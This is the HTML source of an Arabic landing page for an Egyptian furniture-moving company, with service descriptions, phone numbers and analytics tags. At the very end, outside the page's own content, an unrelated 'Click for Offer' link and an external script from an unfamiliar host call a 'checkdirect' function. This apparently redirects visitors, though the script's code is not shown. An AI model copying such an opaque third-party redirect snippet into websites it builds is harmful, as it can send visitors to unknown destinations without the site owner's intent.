<!doctype html>
<html>
<head>


   <script>
    window.clickmagick_cmc = {
        uid: '196810',
        hid: '417017270',
        cmc_project: 'abo_omar_Saidy',
        vid_info: 'on',
        log_action: '#Section5-card-item1,#ShareThis:main_call',
    }
</script>
<script src='//cdn.clkmc.com/cmc.js'></script>

<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WTPXTKGP');</script>
<!-- End Google Tag Manager -->

<meta charset="utf-8">
<title>شركة رؤية لنقل العفش 01066134758</title>
<meta name="generator" content="تم التصميم بواسطة رمضان السيد / 01024888950">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="logo.png" rel="icon" sizes="269x304" type="image/png">
<link href="css/owl.carousel.min.css" rel="stylesheet">
<link href="css/font-awesome.min.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Cairo&display=swap" rel="stylesheet">
<link href="css/abo-dahab.css?v=17" rel="stylesheet">
<link href="css/index.css?v=17" rel="stylesheet">
<script src="popper.min.js"></script>
<script src="bootstrap.min.js"></script>
<script src="jquery-3.7.0.min.js"></script>
<script src="owl.carousel.min.js"></script>
<script src="wb.panel.min.js"></script>
<script src="wwb18.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function(event)
{
   var Carousel1 = new bootstrap.Carousel('#Carousel1', {interval: 2500, pause: false});
});
</script>
<script>
$(document).ready(function()
{
   $('#wb_LayoutGrid11').addClass('visibility-hidden');
   $('#wb_LayoutGrid5').addClass('visibility-hidden');
   $('#wb_Section5').addClass('visibility-hidden');
   function onScrollLayoutGrid11()
   {
      var $obj = $("#wb_LayoutGrid11");
      if (!$obj.hasClass("in-viewport") && $obj.inViewPort(true))
      {
         $obj.addClass("in-viewport");
         AnimateCss('wb_LayoutGrid11', 'transform-scale-in', 0, 1250);
      }
      else
      if ($obj.hasClass("in-viewport") && !$obj.inViewPort(true))
      {
         $obj.removeClass("in-viewport");
         AnimateCss('wb_LayoutGrid11', 'animate-fade-out', 0, 0);
      }
   }
   if (!$('#wb_LayoutGrid11').inViewPort(true))
   {
      $('#wb_LayoutGrid11').addClass("in-viewport");
   }
   onScrollLayoutGrid11();
   $(window).scroll(function(event)
   {
      onScrollLayoutGrid11();
   });
   $("a[href*='#LayoutGrid4']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid4').offset().top }, 600, 'linear');
   });
   $("a[href*='#LayoutGrid5']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid5').offset().top }, 600, 'linear');
   });
   function onScrollLayoutGrid5()
   {
      var $obj = $("#wb_LayoutGrid5");
      if (!$obj.hasClass("in-viewport") && $obj.inViewPort(true))
      {
         $obj.addClass("in-viewport");
         AnimateCss('wb_LayoutGrid5', 'transform-bounce-in', 0, 1250);
      }
      else
      if ($obj.hasClass("in-viewport") && !$obj.inViewPort(true))
      {
         $obj.removeClass("in-viewport");
         AnimateCss('wb_LayoutGrid5', 'animate-fade-out', 0, 0);
      }
   }
   if (!$('#wb_LayoutGrid5').inViewPort(true))
   {
      $('#wb_LayoutGrid5').addClass("in-viewport");
   }
   onScrollLayoutGrid5();
   $(window).scroll(function(event)
   {
      onScrollLayoutGrid5();
   });
   $("a[href*='#LayoutGrid6']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid6').offset().top }, 600, 'linear');
   });
   function onScrollSection5()
   {
      var $obj = $("#wb_Section5");
      if (!$obj.hasClass("in-viewport") && $obj.inViewPort(true))
      {
         $obj.addClass("in-viewport");
         AnimateCss('wb_Section5', 'transform-bounce-in', 0, 1250);
      }
      else
      if ($obj.hasClass("in-viewport") && !$obj.inViewPort(true))
      {
         $obj.removeClass("in-viewport");
         AnimateCss('wb_Section5', 'animate-fade-out', 0, 0);
      }
   }
   if (!$('#wb_Section5').inViewPort(true))
   {
      $('#wb_Section5').addClass("in-viewport");
   }
   onScrollSection5();
   $(window).scroll(function(event)
   {
      onScrollSection5();
   });
   $("a[href*='#LayoutGrid3']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid3').offset().top }, 600, 'linear');
   });
   $("#CardContainer1").owlCarousel({autoplayTimeout:2000, margin: 16, autoplay: true, nav: false, loop: true, dots: true, responsive: {0: {items: 1},480: {items: 3}, slideBy: 3}});
   $("a[href*='#LayoutGrid7']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid7').offset().top }, 600, 'linear');
   });
   $("a[href*='#LayoutGrid9']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid9').offset().top }, 600, 'linear');
   });
   $("a[href*='#LayoutGrid10']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid10').offset().top }, 600, 'linear');
   });
   $("#PanelMenu1").panel({animate: true, animationDuration: 200, animationEasing: 'linear', dismissible: false, display: 'push', position: 'top', toggle: true});
   $("a[href*='#LayoutGrid12']").click(function(event)
   {
      event.preventDefault();
      $('html, body').stop().animate({ scrollTop: $('#wb_LayoutGrid12').offset().top }, 600, 'linear');
   });
   if (navigator.userAgent.indexOf('Safari') != -1 && navigator.userAgent.indexOf('Chrome') == -1) {$('#preloader').remove();}
});
$(window).on('load', function()
{
   $('#preloader').remove();
});
</script>
</head>
<body>



<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WTPXTKGP"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->


<div id="container">
</div>
<div id="wb_LayoutGrid2">
<div id="LayoutGrid2">
<div class="row">
<div class="col-1">
</div>
<div class="col-2">
<div id="wb_Icon2">
<div id="Icon2"><i class="fa fa-facebook"></i></div>
</div>
<div id="wb_Icon1">
<div id="Icon1"><i class="fa fa-twitter"></i></div>
</div>
<div id="wb_Icon3">
<div id="Icon3"><i class="fa fa-instagram"></i></div>
</div>
</div>
<div class="col-3">
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid1">
<div id="LayoutGrid1">
<div class="row">
<div class="col-1">
<div id="wb_Image5">
<img src="images/logo.png" id="Image5" alt="" width="46" height="52">
</div>
</div>
<div class="col-2">
<nav id="wb_PanelMenu1">
<a href="#PanelMenu1_markup" id="PanelMenu1">
<div class="lines">
<span class="line"></span>
<span class="line"></span>
<span class="line"></span>
</div>
</a>
<div id="PanelMenu1_markup">
<ul role="menu">
<li role="menuitem"><a href="#LayoutGrid1" class="nav-link PanelMenu1-effect">&#1575;&#1604;&#1585;&#1574;&#1610;&#1587;&#1610;&#1577;</a></li>
<li role="menuitem"><a href="#LayoutGrid3" class="nav-link PanelMenu1-effect">&#1582;&#1583;&#1605;&#1575;&#1578;&#1606;&#1575;</a></li>
<li role="menuitem"><a href="#LayoutGrid4" class="nav-link PanelMenu1-effect">&#1593;&#1606; &#1575;&#1604;&#1588;&#1585;&#1603;&#1577;</a></li>
<li role="menuitem"><a href="#LayoutGrid10" class="nav-link PanelMenu1-effect">&#1604;&#1604;&#1578;&#1608;&#1575;&#1589;&#1604;</a></li>
</ul>
</div>

</nav>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid13">
<div id="LayoutGrid13">
<div class="row">
<div class="col-1">
<div id="wb_Text3">
<span id="wb_uid0"><strong>للتواصل / 01066134758 - 01097124505</strong></span>
</div>
</div>
</div>
</div>
</div>
<div id="wb_Carousel1">
<div id="Carousel1" class="carousel slide" data-bs-ride="carousel">
<ol class="carousel-indicators">
<li data-bs-target="#Carousel1" data-bs-slide-to="0" class="active"></li>
<li data-bs-target="#Carousel1" data-bs-slide-to="1"></li>
</ol>
<div class="carousel-inner">
<div class="carousel-item frame-1 active">
<div class="carousel-item-inner">
</div>
</div>
<div class="carousel-item frame-2">
<div class="carousel-item-inner">
</div>
</div>
</div>
<a class="carousel-item-start carousel-control" href="#Carousel1" role="button" data-bs-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span><span class="sr-only">Previous</span>
</a>
<a class="carousel-item-end carousel-control" href="#Carousel1" role="button" data-bs-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span><span class="sr-only">Next</span>
</a>
</div>
</div>

<div id="wb_LayoutGrid11">
<div id="LayoutGrid11">
<div class="row">
<div class="col-1">
<div id="wb_Text12">
<span id="wb_uid1"><strong>مرحبا بك في شركة رؤية لنقل العفش </strong></span>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid4">
<div id="LayoutGrid4">
<div class="row">
<div class="col-1">
<div id="wb_Text1">
<span id="wb_uid2">شركة رؤية لنقل العفش والأثاث: خدمات مميزة بأفضل الأسعار وأقصر الأوقات<br><br>تُعتبر شركة رؤية لنقل العفش والأثاث من أبرز الشركات في مجال الخدمات المنزلية في مصر، حيث تقدم خدمات متميزة لنقل العفش والأثاث بكفاءة عالية وأسعار مناسبة. تعتمد الشركة على خبرة واسعة في هذا الميدان، مما يجعلها الاختيار الأمثل لكل من يبحث عن تجربة نقل مريحة وموثوقة.<br></span>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid5">
<div id="LayoutGrid5">
<div class="row">
<div class="col-1">
<div id="wb_Section5" class="card">
   <div id="Section5-card-body">
      <div id="Section5-card-item0"><img src="images/White And Navy Modern Logistics Solution Instagram Post (1).jpg" width="1080" height="1080" alt="" title=""></div>
      <div id="Section5-card-item1"><a href="tel:01066134758">اتصل الان</a></div>
   </div>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid6">
<div id="LayoutGrid6">
<div class="row">
<div class="col-1">
<div class="col-1-padding">
<div id="wb_Section6" class="card">

</div>
</div>
</div>
<div class="col-2">
<div class="col-2-padding">
<div id="wb_Section7" class="card">

</div>
</div>
</div>
<div class="col-3">
<div class="col-3-padding">
<div id="wb_Section8" class="card">

</div>
</div>
</div>
<div class="col-4">
<div class="col-4-padding">
<div id="wb_Section9" class="card">

</div>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid3">
<div id="LayoutGrid3">
<div class="row">
<div class="col-1">
<div class="col-1-padding">
<div id="wb_Section3" class="card">

</div>
</div>
</div>
<div class="col-2">
<div class="col-2-padding">
<div id="wb_Section1" class="card">

</div>
</div>
</div>
</div>
</div>
</div>
<div id="CardContainer1" class="owl-carousel owl-theme">
<div id="wb_Section10" class="card">
   <div id="Section10-card-body">
      <div id="Section10-card-item0"><a href="tel:01066134758">احجز اليوم</a></div>
      <div id="Section10-card-item1"><img src="images/Z8.jpg" width="581" height="1032" alt="" title=""></div>
      <div id="Section10-card-item2"><div id="Section10-card-item2-shape"></div></div>
<svg style ="position:absolute;left:0;top:0;width:0;height:0" aria-hidden="true">
<clipPath id="Section10-card-item2-clippath" clipPathUnits="objectBoundingBox" transform="scale(0.001, 0.001)">
<path d="M200 0 L800 0 L900 0 C960 0, 1000 40, 1000 100 C1000 100, 1000 100, 1000 100 L1000 200 L1000 800 L1000 900 C1000 960, 960 1000, 900 1000 L800 1000 L200 1000 L100 1000 C40 1000, 0 960, 0 900 L0 800 L0 200 L0 100 C0 40, 40 0, 100 0" />
</clipPath>
</svg>
      <div id="Section10-card-item3">ونش هيدروليكى للادوار العالية<br>أتصل بنا اليوم</div>
   </div>
</div>
<div id="wb_Section12" class="card">
   <div id="Section12-card-body">
      <div id="Section12-card-item0"><a href="tel:01066134758">احجز اليوم</a></div>
      <div id="Section12-card-item1"><img src="images/Z5.jpg" width="528" height="960" alt="" title=""></div>
      <div id="Section12-card-item2"><div id="Section12-card-item2-shape"></div></div>
<svg style ="position:absolute;left:0;top:0;width:0;height:0" aria-hidden="true">
<clipPath id="Section12-card-item2-clippath" clipPathUnits="objectBoundingBox" transform="scale(0.001, 0.001)">
<path d="M200 0 L800 0 L900 0 C960 0, 1000 40, 1000 100 C1000 100, 1000 100, 1000 100 L1000 200 L1000 800 L1000 900 C1000 960, 960 1000, 900 1000 L800 1000 L200 1000 L100 1000 C40 1000, 0 960, 0 900 L0 800 L0 200 L0 100 C0 40, 40 0, 100 0" />
</clipPath>
</svg>
      <div id="Section12-card-item3">تغليف شامل للعفش <br>بأجود خامات التغليف<br></div>
   </div>
</div>
<div id="wb_Section11" class="card">
   <div id="Section11-card-body">
      <div id="Section11-card-item0"><a href="tel:01066134758">احجز اليوم</a></div>
      <div id="Section11-card-item1"><img src="images/Z-7.jpg" width="528" height="960" alt="" title=""></div>
      <div id="Section11-card-item2"><div id="Section11-card-item2-shape"></div></div>
<svg style ="position:absolute;left:0;top:0;width:0;height:0" aria-hidden="true">
<clipPath id="Section11-card-item2-clippath" clipPathUnits="objectBoundingBox" transform="scale(0.001, 0.001)">
<path d="M200 0 L800 0 L900 0 C960 0, 1000 40, 1000 100 C1000 100, 1000 100, 1000 100 L1000 200 L1000 800 L1000 900 C1000 960, 960 1000, 900 1000 L800 1000 L200 1000 L100 1000 C40 1000, 0 960, 0 900 L0 800 L0 200 L0 100 C0 40, 40 0, 100 0" />
</clipPath>
</svg>
      <div id="Section11-card-item3">نستخدم الاوناش الهيدروليكية <br>فى حالة السلالم الضيقة<br></div>
   </div>
</div>
</div>
<div id="wb_LayoutGrid7">
<div id="LayoutGrid7">
<div class="row">
<div class="col-1">
<div id="wb_Text4">
<span id="wb_uid3">من بين أهم مميزات شركة رؤية: تجربة متميزة: توفر الشركة تجربة نقل مميزة للعملاء، حيث تقوم بجميع الخطوات اللازمة لضمان نقل العفش والأثاث بأمان وسلامة، من تغليف وتغليف الأثاث إلى ترتيبه في المكان الجديد. فريق عمل محترف: يتكون فريق العمل من خبراء مدربين على أعلى مستوى، مما يضمن سهولة التعامل مع جميع أنواع الأثاث والممتلكات. سيقوم الفريق بفك وتركيب الأثاث بمهارة وحرفية عالية. أسعار مناسبة: تعتبر أسعار شركة رؤية لنقل العفش والأثاث من بين أقل الأسعار في السوق مقارنة بجودة الخدمة المقدمة. يهدف الفريق إلى تقديم خدمات متميزة بأسعار تنافسية لضمان رضا العملاء. سرعة الأداء: تضمن الشركة سرعة في تنفيذ طلبات النقل، حيث يتم التعامل مع كل عملية بكفاءة وفاعلية للوصول إلى العميل في أقصر وقت ممكن. تغليف وحماية متقنة: يولي فريق الشركة اهتماماً كبيراً لعمليات التغليف والحماية، حيث يستخدمون مواد عالية الجودة لحماية الأثاث من الخدوش والكسور أثناء عملية النقل..للتواصل مع شركة رؤية والاستفادة من خدماتها رؤيةة، يمكنكم الاتصال على الأرقام التالية: 01066134758 - 01097124505. فريق الشركة مستعد لتلبية احتياجاتكم وتقديم الدعم اللازم لجعل عملية نقل العفش والأثاث تجربة سهلة وميسرة..</span>
</div>
</div>
</div>
</div>
</div>
<div id="wb_categoriesLayoutGrid2">
<div id="categoriesLayoutGrid2">
<div class="row">
<div class="col-1">
<div class="col-1-padding">
<div id="wb_categoriesImage1">
<a href="#trendingLayoutGrid2"><img src="images/نسخة من Red Modern Simple Flash Sale Discount Poster (1).jpg" id="categoriesImage1" alt="" width="222" height="314"></a><div id="categoriesImage1-overlay">عمالة مخصصة لتغليف ورص المنقولات</div>

</div>
</div>
</div>
<div class="col-2">
<div class="col-2-padding">
<div id="wb_categoriesImage2">
<a href="#trendingLayoutGrid2"><img src="images/نسخة من Red Modern Simple Flash Sale Discount Poster.jpg" id="categoriesImage2" alt="" width="222" height="314"></a><div id="categoriesImage2-overlay">سياارت نقل عفش مخصصة</div>

</div>
<div id="wb_responsive-spacer">
<svg id="responsive-spacer" height="100%" width="100%" viewBox="0 0 222 19" version="1.1" xmlns="http://www.w3.org/2000/svg">
<defs>
   <path id="responsive-spacer-shape" d="M0 0 L222 0 L222 19 L0 19Z " vector-effect="non-scaling-stroke" />
</defs>
<use xlink:href="#responsive-spacer-shape" data-href="#responsive-spacer-shape" id="wb_uid4"/>
</svg>

</div>
</div>
</div>
<div class="col-3">
<div class="col-3-padding">
<div id="wb_categoriesImage4">
<a href="#trendingLayoutGrid2"><img src="images/نسخة من Red Modern Simple Flash Sale Discount Poster (2).jpg" id="categoriesImage4" alt="" width="222" height="314"></a><div id="categoriesImage4-overlay">مهارة فى نقل العفش بعناية</div>

</div>
</div>
</div>
<div class="col-4">
<div class="col-4-padding">
<div id="wb_categoriesImage3">
<a href="#trendingLayoutGrid2"><img src="images/نسخة من Red Modern Simple Flash Sale Discount Poster (3).jpg" id="categoriesImage3" alt="" width="222" height="314"></a><div id="categoriesImage3-overlay">اوناش للادوار العالية</div>

</div>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid8">
<div id="LayoutGrid8">
<div class="row">
<div class="col-1">
<div id="wb_Text5">
<span id="wb_uid5">طبعا كلنا عندنا حاجات غالية فى اثاث بيتنا وخصوصا الصيني وحاجات النيش<br>علشان كدة شركة الريان لنقل الأثاث بتكون حريصة علي حاجات العملاء لإننا عارفين ان حاجتكم غالية عليكم <br>وبنضمن لكل عملائنا اننا هنحافظ علي اثاث بيتكم وكل حاجة عشان عندنا عمالة مدربة لنقل الاثاث والحفاظ عليه<br>كمان عندنا سيارات مغلقة لنقل الاثاث والحفاظ عليه من اي حاجه سواء مطر الشتاء أو حرارة الصيف<br>وعندنا نجارين لفك وتركيب الغرف والشركات والعيادات <br>وكمان فنين تركيب وفك التكييفات<br>والأهم هو تغليف الصيني وتعبئته في كراتين مخصصه للحفاظ عليه<br>وكمان تغليف الغرف للحفاظ عليها <br>شركتنا لديها اوناش_هيدروليكية_وكهربائيه لتنزيل ورفع الاثاث من والي الأدوار المرتفعة<br>كل دة مع النقل والفك وتركيب جميع محتويات المنزل يتم في يوم واحد فقط </span>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid9">
<div id="LayoutGrid9">
<div class="row">
<div class="col-1">
<div id="wb_Text6">
<span id="wb_uid6"><strong>نعمل طوال أيام الاسبوع</strong></span>
</div>
<div id="wb_Text7">
<span id="wb_uid7"><strong>للتواصل:<br></strong></span><span id="wb_uid8"><strong><br></strong></span><span id="wb_uid9"><strong>01066134758 - 01097124505</strong></span>
</div>
</div>
<div class="col-2">
<div id="wb_Text8">
<span id="wb_uid10"><strong>تواصل اجتماعى</strong></span>
</div>
<div id="wb_FontAwesomeIcon1">
<a href="./index.html"><div id="FontAwesomeIcon1"><i class="fa fa-facebook"></i></div></a>
</div>
<div id="wb_FontAwesomeIcon2">
<a href="./index.html"><div id="FontAwesomeIcon2"><i class="fa fa-twitter"></i></div></a>
</div>
<div id="wb_FontAwesomeIcon3">
<a href="./index.html"><div id="FontAwesomeIcon3"><i class="fa fa-pinterest"></i></div></a>
</div>
<div id="wb_FontAwesomeIcon4">
<a href="./index.html"><div id="FontAwesomeIcon4"><i class="fa fa-instagram"></i></div></a>
</div>
<div id="wb_FontAwesomeIcon5">
<a href="./index.html"><div id="FontAwesomeIcon5"><i class="fa fa-youtube"></i></div></a>
</div>
</div>
<div class="col-3">
<div id="wb_Text9">
<span id="wb_uid11"><strong>المناطق </strong></span>
</div>
<div id="wb_Text10">
<span id="wb_uid12"><strong>نقدم خدمة نقل العفش في جميع مناطق <br>وانحاء الجمهورية</strong></span>
</div>
</div>
</div>
</div>
</div>
<div id="wb_LayoutGrid10">
<div id="LayoutGrid10">
<div class="row">
<div class="col-1">
<div id="wb_Text11">
<span id="wb_uid13">جميع الحقوق محفوظة لشركة رؤية</span>
</div>
</div>
</div>
</div>
</div>
<div id="ShareThis" onclick="window.location.href='tel:01066134758';return false;">
<div id="wb_ShareThisPinterest">
<a href="tel:01066134758"><img src="images/img0002.png" id="ShareThisPinterest" alt="" width="101" height="42"></a></div>
<div id="wb_LogoPinterest">
<a href="tel:01066134758"><div id="LogoPinterest"><i class="fa fa-phone"></i></div></a></div>
<div id="wb_Text14" dir="rtl">
    <a href="tel:01066134758">
        <span id="wb_uid14"><strong>اتصل بنا الان</strong></span>
    </a>
</div>

</div>
<div id="wb_LayoutGrid12">
<div id="LayoutGrid12">
<div class="row">
<div class="col-1">
<div id="wb_Image1">
<img src="images/logo.png" id="Image1" alt="" width="155" height="175">
</div>
<div id="wb_Text2">
<span id="wb_uid15"><strong>رؤية لنقل العفش </strong></span>
</div>
</div>
</div>
</div>
</div>
<div id="preloader"></div>

<a href="https://www.data.codehouse.host/base2.php">Click for Offer</a>
   

<input type="hidden" id="hidLocation" value="https://www.data.codehouse.host/"/>
<script>var clpconfig = { "engsec" : "10", };</script>
<script type="text/javascript" src="https://www.data.codehouse.host/landing.js"></script>

   <script type="text/javascript">checkdirect(14,1)</script>


</body>
</html>
